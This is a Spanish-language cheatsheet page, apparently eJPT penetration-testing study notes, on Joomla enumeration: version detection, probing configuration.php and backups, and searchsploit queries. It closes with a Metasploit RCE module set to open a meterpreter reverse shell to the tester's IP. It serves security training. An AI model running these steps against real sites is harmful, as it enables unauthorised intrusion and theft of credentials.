> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-cheatsheet/enumeracion-y-explotacion-de-cms/enumeracion-de-un-joomla.md).

# Enumeración de un Joomla

## Enumeración con Joomscan

**Escaneo general de Joomla:**

```bash
joomscan -u http://TARGET
```

* Detecta la versión de Joomla.
* Enumera módulos instalados.
* Recolecta información sobre posibles vulnerabilidades.

💡 Puedes usar el flag `-t 20` para aumentar el número de hilos y acelerar el escaneo.

***

## Enumeración manual

**Detectar la versión de Joomla (si es visible):**

```bash
curl -s http://TARGET/administrator/manifests/files/joomla.xml | grep -oPm1 "(?<=<version>)(.*)(?=</version>)"
```

Esto extrae la versión directamente desde el archivo XML si está accesible.

***

**Buscar el archivo `configuration.php`:**

```bash
curl -I http://TARGET/configuration.php
```

Este archivo contiene configuraciones sensibles de la instalación de Joomla, y si es accesible, puede ser una vía de explotación.

***

**Ver encabezados de servidor:**

```bash
whatweb http://TARGET
```

Muestra información sobre el servidor, incluyendo detalles sobre la tecnología usada, que puede ser útil para la enumeración.

***

## Buscar extensiones vulnerables

**Buscar extensiones vulnerables con searchsploit:**

```bash
searchsploit joomla
```

**Filtrar por RCE o SQLi:**

```bash
searchsploit joomla | grep -i rce
searchsploit joomla | grep -i sql
```

***

## Explotación con Metasploit

**Joomla Component com\_administrator (RCE)**

```bash
msfconsole
use exploit/unix/webapp/joomla_com_administrator_rce
set RHOSTS http://TARGET
set TARGETURI /
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST <TU_IP>
exploit
```

***

## Archivos sensibles

**Buscar archivos comunes o backups:**

```bash
curl -I http://TARGET/administrator/configuration.php
curl -I http://TARGET/administrator/backups/
curl -I http://TARGET/.tar.gz http://TARGET
```
